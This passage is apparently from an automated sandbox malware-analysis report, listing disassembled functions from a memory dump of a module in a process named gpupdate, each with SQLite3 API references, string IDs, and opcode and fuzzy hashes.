                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: Sleep_amsg_exit
                                              • String ID: `u]$hu]
                                              • API String ID: 1015461914-2746222232
                                              • Opcode ID: 1a593bc5e3edbe8f23766bcb5f6706d080843928a710e75c9e644a3bd523553d
                                              • Instruction ID: 9dc8922988c78427fafa168116479d82861df3a41db44ccffeb5bae1e7f7d173
                                              • Opcode Fuzzy Hash: 1a593bc5e3edbe8f23766bcb5f6706d080843928a710e75c9e644a3bd523553d
                                              • Instruction Fuzzy Hash: A74162716146828BEB05AFE8C681706B7F1EB5A34EF24C93DE4848F380D775D890DB82
                                              Function 61E1FB10 Relevance: 15.2, APIs: 10, Instructions: 203COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_value_bytessqlite3_value_text$memcmpsqlite3_result_error_toobig
                                              • String ID:
                                              • API String ID: 3428878466-0
                                              • Opcode ID: 74791f51405c183fcf2562a18b5a8bf0abfcaf0da25c776698cfabd7b62de9c7
                                              • Instruction ID: cc80130e615462bd23a121d481f2e8b4ba8ccbe96d214a8032bf39390ca00fb1
                                              • Opcode Fuzzy Hash: 74791f51405c183fcf2562a18b5a8bf0abfcaf0da25c776698cfabd7b62de9c7
                                              • Instruction Fuzzy Hash: 1B81D675E082598FCB04DFA8D881A9DBBF1BF88314F258169E854EB358D738E845CF90
                                              Function 61E3342A Relevance: 13.9, APIs: 9, Instructions: 408COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_freesqlite3_malloc
                                              • String ID:
                                              • API String ID: 423083942-0
                                              • Opcode ID: f0ab177ff146e42c06a09af7d4380f4d6485011f20699f8e7bf040882a484be1
                                              • Instruction ID: 00b07d2fee553a51b9a9e57e5f7984a034e0dc9439f325f4ead7b7e0fd2a2fd8
                                              • Opcode Fuzzy Hash: f0ab177ff146e42c06a09af7d4380f4d6485011f20699f8e7bf040882a484be1
                                              • Instruction Fuzzy Hash: 2802B074A05229DFDB05CFA8D580A9EFBF1BF88314F25815AE814AB355D734E941CFA0
                                              Function 61E3CDDA Relevance: 13.8, APIs: 9, Instructions: 341COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_value_text.SQLITE3 ref: 61E3CDF9
                                              • sqlite3_result_error_toobig.SQLITE3 ref: 61E3CEDA
                                              • sqlite3_result_error_nomem.SQLITE3 ref: 61E3CF00
                                              • sqlite3_snprintf.SQLITE3 ref: 61E3D17C
                                              • sqlite3_snprintf.SQLITE3 ref: 61E3D1A9
                                              • sqlite3_snprintf.SQLITE3 ref: 61E3D1B3
                                              • sqlite3_snprintf.SQLITE3 ref: 61E3D219
                                              • sqlite3_result_text.SQLITE3 ref: 61E3D33C
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_snprintf$sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
                                              • String ID:
                                              • API String ID: 2444656285-0
                                              • Opcode ID: da9847361954a1eefe37fc5ccefec46496996f87dbcc5ab6976873f478d2db9a
                                              • Instruction ID: 1ab56827afc412cc06a1ed1da5a3bcddb67cd7557a810234fb9835e8ecb6bea3
                                              • Opcode Fuzzy Hash: da9847361954a1eefe37fc5ccefec46496996f87dbcc5ab6976873f478d2db9a
                                              • Instruction Fuzzy Hash: C4E19E7994827A8FDB208F58C8807A9BBF1BFC9314F65C49AE49897304D734D986DF42
                                              Function 61E2966D Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_snprintf$sqlite3_result_textsqlite3_result_value
                                              • String ID:
                                              • API String ID: 336169149-0
                                              • Opcode ID: e371e1066de399e0944919f7e8956e32a83f4106959c8003957517aa69222eaa
                                              • Instruction ID: c7c43531a8ef6a5b99c19bf28209943847d37278226f94327fddd60415e013d7
                                              • Opcode Fuzzy Hash: e371e1066de399e0944919f7e8956e32a83f4106959c8003957517aa69222eaa
                                              • Instruction Fuzzy Hash: 5F61DF70A0C395CAD7159F64C8A075ABFE2AF86308F28D95CD4C88B396D779C845C742
                                              Function 61E35912 Relevance: 13.6, APIs: 9, Instructions: 127COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_get_auxdata$memcmpsqlite3_freesqlite3_malloc64sqlite3_result_error_nomemsqlite3_set_auxdatasqlite3_value_bytessqlite3_value_text
                                              • String ID:
                                              • API String ID: 3041890313-0
                                              • Opcode ID: 5fabf5169ebee93b486c0f1008a988fc569234ce7d063c742400fef6d86e9336
                                              • Instruction ID: dad316934e092df19beeac69b286e745131a7f75eafa426450bbf9eb9359d472
                                              • Opcode Fuzzy Hash: 5fabf5169ebee93b486c0f1008a988fc569234ce7d063c742400fef6d86e9336
                                              • Instruction Fuzzy Hash: DB51D2B0A053298FDB40DFA9C48069EBBF4BF89314F24856AE894E7344E735D842CF91
                                              Function 61E7BC44 Relevance: 13.6, APIs: 9, Instructions: 118COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_malloc64.SQLITE3 ref: 61E7BCBB
                                              • sqlite3_exec.SQLITE3 ref: 61E7BCEE
                                              • sqlite3_free_table.SQLITE3 ref: 61E7BD0D
                                              • sqlite3_free.SQLITE3 ref: 61E7BD21
                                              • sqlite3_mprintf.SQLITE3 ref: 61E7BD34
                                              • sqlite3_free.SQLITE3 ref: 61E7BD41
                                              • sqlite3_free.SQLITE3 ref: 61E7BD54
                                                • Part of subcall function 61E0A05C: sqlite3_mutex_enter.SQLITE3 ref: 61E0A07B
                                              • sqlite3_free_table.SQLITE3 ref: 61E7BD68
                                                • Part of subcall function 61E0A7B2: sqlite3_free.SQLITE3 ref: 61E0A7E0
                                              • sqlite3_free_table.SQLITE3 ref: 61E7BD91
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_free$sqlite3_free_table$sqlite3_execsqlite3_malloc64sqlite3_mprintfsqlite3_mutex_enter
                                              • String ID:
                                              • API String ID: 1665699395-0
                                              • Opcode ID: e44638073037bff62b29a1792cda0d217e8a09ab654b672d14ff6c9d0c379d0f
                                              • Instruction ID: bd1a7220a5ee3b0433ec224f3a920f2ef3a3d46db5c31898fd629bffce75d334
                                              • Opcode Fuzzy Hash: e44638073037bff62b29a1792cda0d217e8a09ab654b672d14ff6c9d0c379d0f
                                              • Instruction Fuzzy Hash: C951AEB09052599FEB10DFA4D59479EBBF0BF89308F208829E954AB350D779E840CB92
                                              Function 61E313AB Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 364COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: memcmp$sqlite3_free$sqlite3_malloc64
                                              • String ID: 0
                                              • API String ID: 3361124181-4108050209
                                              • Opcode ID: f2c6445ad8d7389a7e83cd00da8bb4ddd8f573ecac29d58e3685c1f389552ee8
                                              • Instruction ID: a5e193722d3dc711dc3b49e61c08e85e2fef21f5c2afdadff0dd5e610fdd725b
                                              • Opcode Fuzzy Hash: f2c6445ad8d7389a7e83cd00da8bb4ddd8f573ecac29d58e3685c1f389552ee8
                                              • Instruction Fuzzy Hash: AAE11270A043698BDB11CFE8C88078DBBF1BF89318F29856DD859AB395D774D886CB41
                                              Function 61E83323 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 115COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_step.SQLITE3(?,?,?,?,?,?,?,00000004,?,?,61E83C6D), ref: 61E83362
                                              • sqlite3_finalize.SQLITE3 ref: 61E833E2
                                              • sqlite3_finalize.SQLITE3 ref: 61E83431
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_finalize$sqlite3_step
                                              • String ID: integer$null$real
                                              • API String ID: 2395141310-2769304496
                                              • Opcode ID: 1adb2ed51ac05a16fd7040bbbf6f5b086eeec33a899d3fc5bf794e647c42a555
                                              • Instruction ID: 9d2ae350c6e30988beaaaa9d8298a2f8f8255ae0de825e730fb59bbc1bc531e0
                                              • Opcode Fuzzy Hash: 1adb2ed51ac05a16fd7040bbbf6f5b086eeec33a899d3fc5bf794e647c42a555
                                              • Instruction Fuzzy Hash: A851E7B49047558FCB44DFA9C08469ABBF0FF88318F25C96DD858AB315E738E841CBA5
                                              Function 61E978B0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109filememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: Virtual$ProtectQueryabortfwritevfprintf
                                              • String ID: @
                                              • API String ID: 1503958624-2766056989
                                              • Opcode ID: 3ec6ce6788a2d01dddcba880c25e86f857e03ed939df6faa52ee8d726a769615
                                              • Instruction ID: a218dd27357637e417779710e45561f345a70d998a48e32acbe915a2fdb0a19e
                                              • Opcode Fuzzy Hash: 3ec6ce6788a2d01dddcba880c25e86f857e03ed939df6faa52ee8d726a769615
                                              • Instruction Fuzzy Hash: 204103B19147428FE700DF68C684A1ABBE0FF89354F65CD1DE89897310E734E888CB92
                                              Function 61E1F44A Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_aggregate_context.SQLITE3 ref: 61E1F47F
                                              • sqlite3_value_text.SQLITE3 ref: 61E1F4A8
                                              • sqlite3_value_bytes.SQLITE3 ref: 61E1F4B5
                                              • sqlite3_str_append.SQLITE3 ref: 61E1F4D5
                                              • sqlite3_value_text.SQLITE3 ref: 61E1F4DF
                                              • sqlite3_value_bytes.SQLITE3 ref: 61E1F4EB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_aggregate_contextsqlite3_str_append
                                              • String ID: ,)?
                                              • API String ID: 2741546359-1010226240
                                              • Opcode ID: d417e1e5df0664bf7dad4a1144e0c11632324592b44ddcb909f9319c4ee388d1
                                              • Instruction ID: 503c218e469a31749f401a3f5cd8a0f72a2a3d8fdd73fe7239a648f55af07bd1
                                              • Opcode Fuzzy Hash: d417e1e5df0664bf7dad4a1144e0c11632324592b44ddcb909f9319c4ee388d1
                                              • Instruction Fuzzy Hash: AB213A75A086458FD700DF69C48165ABBE0FF88324F25C92EE8988B308E739D885CB81
                                              Function 61E36F85 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_aggregate_context.SQLITE3 ref: 61E36F9D
                                              • sqlite3_result_error_nomem.SQLITE3 ref: 61E36FCA
                                              • sqlite3_result_text.SQLITE3 ref: 61E36FFB
                                              • sqlite3_result_text.SQLITE3 ref: 61E37049
                                              • sqlite3_result_subtype.SQLITE3 ref: 61E37059
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_result_text$sqlite3_aggregate_contextsqlite3_result_error_nomemsqlite3_result_subtype
                                              • String ID: J
                                              • API String ID: 3250357221-1141589763
                                              • Opcode ID: 387d80029b785d1c61980da03ff1b61a0f60f3dd74c7e3b4151b6cc2c569979c
                                              • Instruction ID: be047d13a9b124e9cc431b6e429566fe10b0290276836b2fc8986ac24132eb3e
                                              • Opcode Fuzzy Hash: 387d80029b785d1c61980da03ff1b61a0f60f3dd74c7e3b4151b6cc2c569979c
                                              • Instruction Fuzzy Hash: 89212FB5508751DBDB109F68C48520BBFE4AFC9728F24C65DE8A88B385D375C851CF92
                                              Function 61E36DE5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_aggregate_context.SQLITE3 ref: 61E36DFD
                                              • sqlite3_result_error_nomem.SQLITE3 ref: 61E36E28
                                              • sqlite3_result_text.SQLITE3 ref: 61E36E59
                                              • sqlite3_result_text.SQLITE3 ref: 61E36EA7
                                              • sqlite3_result_subtype.SQLITE3 ref: 61E36EB7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_result_text$sqlite3_aggregate_contextsqlite3_result_error_nomemsqlite3_result_subtype
                                              • String ID: J
                                              • API String ID: 3250357221-1141589763
                                              • Opcode ID: 280f055a0008d2c72e4f2c46247794635859fd7a9a20ef6690375c3512d5286c
                                              • Instruction ID: 050e4153146da9f142c6f0f94306fa302facae42750b8af2f2a27c4e713f296f
                                              • Opcode Fuzzy Hash: 280f055a0008d2c72e4f2c46247794635859fd7a9a20ef6690375c3512d5286c
                                              • Instruction Fuzzy Hash: 542141B05087509BDB009F79C08520B7BE0AFC9B28F24C65DF8A88B385D375C955CBA6
                                              Function 61E9667D Relevance: 10.8, APIs: 7, Instructions: 273COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_freesqlite3_randomness$sqlite3_malloc64sqlite3_mutex_entersqlite3_mutex_leave
                                              • String ID:
                                              • API String ID: 2164697240-0
                                              • Opcode ID: f94663480e5a11dc084e31704d58bb45c056531d4a2553746783db3449465d92
                                              • Instruction ID: 3144889365117d4ea9a5d64aee0a61d1890beb2d0abc1a86df9062dcc99d1af7
                                              • Opcode Fuzzy Hash: f94663480e5a11dc084e31704d58bb45c056531d4a2553746783db3449465d92
                                              • Instruction Fuzzy Hash: 99B15A75A0528ADFDB04CF69C580A8DB7B1FF4A314F28C96AEC64AB350D774E941CB90
                                              Function 61E1FD5D Relevance: 10.7, APIs: 7, Instructions: 177COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
